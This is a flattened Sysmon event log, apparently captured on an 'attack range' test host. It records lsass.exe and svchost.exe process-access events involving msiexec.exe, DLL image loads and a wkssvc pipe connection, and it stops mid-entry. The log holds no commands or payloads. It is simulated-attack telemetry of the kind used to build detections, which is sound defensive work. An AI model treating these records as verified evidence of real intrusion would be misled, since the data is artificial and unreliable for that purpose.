15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694101Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694100Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694099Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694098Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694097Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694096Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.694{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694095Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694094Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694093Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694092Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694091Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694090Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694089Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694088Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694087Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 18141800x80000000000000002694085Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-ConnectPipe2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952\wkssvcc:\windows\system32\msiexec.exeWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694084Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694083Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694082Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694081Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694080Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\msctf.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=CA0121D9089BBFE1CB95A04E09E04C90,SHA256=B264FBE125E02FFBCDBBFF811B75B3ECEF31FD7762BD67BEE41492ED33CC146FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694079Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694078Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9825-62AC-2A6B-000000006202}1952c:\windows\system32\msiexec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694077Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694076Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694075Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694074Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694073Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694072Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.678{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694071Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694070Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694069Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:09.662{7CF983DC-9825-62AC-2A6B-000000006202}1952C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft 